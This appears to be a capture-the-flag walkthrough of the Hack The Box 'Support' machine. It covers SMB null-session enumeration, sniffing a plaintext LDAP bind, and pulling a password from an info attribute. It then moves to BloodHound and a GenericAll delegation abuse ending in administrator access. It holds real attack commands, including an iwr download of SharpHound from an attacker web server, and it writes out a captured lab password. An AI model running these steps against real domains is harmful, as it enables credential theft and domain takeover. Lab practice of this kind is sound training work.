This machine was quite interesting. The initial foothold requires us to analyse traffic using Wireshark, something I haven't practised as much as other tools since beginning my OSCP journey. You must also be patient and have a keen eye for detail to find the password for support after you have enumerated using LDAP. All in all, it was good practice for skills I will surely need.
1. Let's start this machine off with an nmap scan. There are quite a few interesting ports open and the best bet is to enumerate them one by one. I personally like to start with SMB enumeration in this case.
sudo nmap -p- 10.10.11.174 -sC -sV
2. A quick enumeration of SMB shares with crackmapexec (a null session works here, so any username with an empty password will do) lists the shares we may be able to browse with smbclient.
crackmapexec smb 10.10.11.174 -u 'test' -p '' --shares
3. The support-tools share looks interesting. We use smbclient with an anonymous (null) session to list its contents and see what we can find.
4. Of the executables in this share, only UserInfo is not widely used software (most likely developed in-house), so we download it and take a closer look.
5. The application runs under wine and prints a help menu showing how to use it. If wine refuses to run it you may need to install wine-mono, since this is a .NET binary.
6. Running the find command gives a connect error. Capturing the traffic in Wireshark while the application runs shows that it authenticates to LDAP with an unencrypted simple bind, so the bind name and password for the user ldap are visible in plaintext in the capture. We can use these credentials to perform LDAP enumeration and see what else we can find.
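To see why Wireshark can simply read the password out of the capture, here is an added example (not code from the write-up or from UserInfo.exe) that BER-encodes and decodes an LDAPv3 simple BindRequest as defined in RFC 4511. The name and password in the sample packet are placeholders constructed for the example, not the credentials captured on the box; the BER helpers are hand-written and only cover the definite-length forms that LDAP uses.

```python
"""Decode an LDAPv3 simple BindRequest (RFC 4511) from raw packet bytes.

Added example, not code from the original write-up or from UserInfo.exe.
The credentials in SAMPLE are placeholders constructed here, not the real
ones captured on the box.
"""


def _tlv(tag: int, value: bytes) -> bytes:
    """BER-encode one tag-length-value (short or long definite length)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    len_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(len_bytes)]) + len_bytes + value


def _read_tlv(buf: bytes, pos: int):
    """Parse one BER TLV at pos; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits count length bytes
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def build_bind_request(message_id: int, name: str, password: str) -> bytes:
    """Encode what a client sends for a simple bind (Wireshark: bindRequest(1))."""
    body = (
        _tlv(0x02, bytes([3]))              # version INTEGER 3
        + _tlv(0x04, name.encode())         # name LDAPDN (OCTET STRING)
        + _tlv(0x80, password.encode())     # authentication [0] simple: raw password
    )
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, body))


def parse_bind_request(packet: bytes) -> dict:
    """Recover message ID, version, bind name and password from a simple BindRequest."""
    tag, message, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("LDAPMessage must be a SEQUENCE (0x30)")
    tag, msg_id, pos = _read_tlv(message, 0)
    if tag != 0x02:
        raise ValueError("messageID must be an INTEGER")
    tag, bind, _ = _read_tlv(message, pos)
    if tag != 0x60:                         # [APPLICATION 0] constructed = BindRequest
        raise ValueError("protocolOp is not a BindRequest")
    _, version, pos = _read_tlv(bind, 0)
    _, name, pos = _read_tlv(bind, pos)
    tag, auth, _ = _read_tlv(bind, pos)
    if tag != 0x80:                         # 0xA3 would be a SASL bind (e.g. GSSAPI)
        raise ValueError("not a simple bind; password is not sent in the clear")
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": version[0],
        "name": name.decode(),
        "password": auth.decode(),
    }


def is_simple_bind(packet: bytes) -> bool:
    """True when the bind carries a plaintext password rather than a SASL exchange."""
    try:
        parse_bind_request(packet)
        return True
    except ValueError:
        return False


# Constructed sample: placeholder credentials, same shape as the captured bind.
SAMPLE = build_bind_request(1, "support\\ldap", "Placeholder-Pass-123")

# Constructed SASL bind (empty GSSAPI-style [3] choice) for comparison.
SASL_SAMPLE = _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x60, _tlv(0x02, b"\x03") + _tlv(0x04, b"") + _tlv(0xA3, b"")))

if __name__ == "__main__":
    print(SAMPLE.hex())
    print(parse_bind_request(SAMPLE))
    print("SASL bind exposes password:", is_simple_bind(SASL_SAMPLE))
```

The bytes printed by the `__main__` block are exactly what Wireshark dissects under LDAP > bindRequest; the `0x80` tag on the last field is the tell-tale of a simple bind, and anything on port 389 without STARTTLS or LDAPS carries it in the clear.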
7. Running this command:
ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"
We get a large amount of output to sift through, but with a keen eye we find the support account's password stored in the info attribute of its user object.
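Rather than eyeballing the whole dump, the info attribute can be pulled out programmatically. The following is an added example, not part of the write-up: a small parser for the LDIF that ldapsearch -x emits, which handles the two things that make grepping unreliable, namely continuation lines (a leading space means "append to the previous line", which is how long values get wrapped) and base64-encoded values (attr:: value). SAMPLE_LDIF is a constructed excerpt with placeholder values, not the real output from the box.

```python
"""Pull one attribute (here: info) out of ldapsearch's LDIF output.

Added example, not part of the original write-up. SAMPLE_LDIF is a constructed
excerpt in the format ldapsearch -x emits; the values in it are placeholders.
"""
import base64

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
#

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: user
cn: support
sAMAccountName: support
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
info: Placeholder-Pass
 word-123

# alice, Users, support.htb
dn: CN=alice,CN=Users,DC=support,DC=htb
objectClass: user
cn: alice
sAMAccountName: alice
info:: ZXhhbXBsZSBub3Rl

# search result
search: 2
result: 0 Success
"""


def _unfold(text: str) -> list:
    """Join LDIF continuation lines (a leading space means 'append to previous line')."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> list:
    """Return a list of entries; each entry is {attribute_lowercase: [values...]}."""
    entries, current = [], None
    for line in _unfold(text):
        if not line.strip():                 # blank line ends an entry
            if current is not None:
                entries.append(current)
            current = None
            continue
        if line.startswith("#"):             # ldapsearch comments
            continue
        key, sep, rest = line.partition(":")
        if not sep:
            continue
        if rest.startswith(":"):             # "attr:: base64" for values unsafe as text
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest[1:] if rest.startswith(" ") else rest   # one separator space
        key = key.lower()                    # LDAP attribute names are case-insensitive
        if key == "dn":
            current = {"dn": [value]}
        elif current is not None:            # skips trailer lines such as "result: 0 Success"
            current.setdefault(key, []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def find_attribute(entries: list, attr: str) -> list:
    """(sAMAccountName or dn, value) for every entry that carries attr."""
    hits = []
    for entry in entries:
        for value in entry.get(attr.lower(), []):
            who = entry.get("samaccountname", entry["dn"])[0]
            hits.append((who, value))
    return hits


if __name__ == "__main__":
    for account, note in find_attribute(parse_ldif(SAMPLE_LDIF), "info"):
        print(f"{account}: {note}")
```

Feed it the saved ldapsearch output (`parse_ldif(open("dump.ldif").read())`) and ask for info, description or any other free-text attribute; those are the usual places where administrators leave passwords behind.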
8. We can now log in as the support user with evil-winrm and read the user.txt flag.
9. Next we get SharpHound onto the target. First start a Python web server on the attacking machine:
python3 -m http.server 8000
then fetch the binary from the evil-winrm session:
iwr -uri http://<kali_ip>:8000/SharpHound.exe -Outfile SharpHound.exe
(evil-winrm's upload function would have done the job too). After SharpHound has run, transfer the resulting zip file back to our machine with evil-winrm's download function.
10. Once the zip file has been transferred and neo4j is running, upload it to BloodHound and investigate.
11. Mark the support user as owned and select Group Delegated Object Control. We see that support is a member of the Shared Support Account group, which has GenericAll over the domain controller's computer object.
12. Right-clicking the GenericAll edge and opening Help shows how this privilege can be abused.
13. Following the help word for word, and adjusting the final command to our domain, gives us a ticket for the administrator user.
14. If importing the ticket on the target fails, copy it to the attacking machine, base64-decode it and convert it to a .ccache with impacket-ticketConverter.
15. Point KRB5CCNAME at the converted .ccache and use impacket-psexec with Kerberos authentication (-k -no-pass) to log in as administrator, addressing the DC by its FQDN so the service principal matches the ticket. Once in, root.txt is waiting.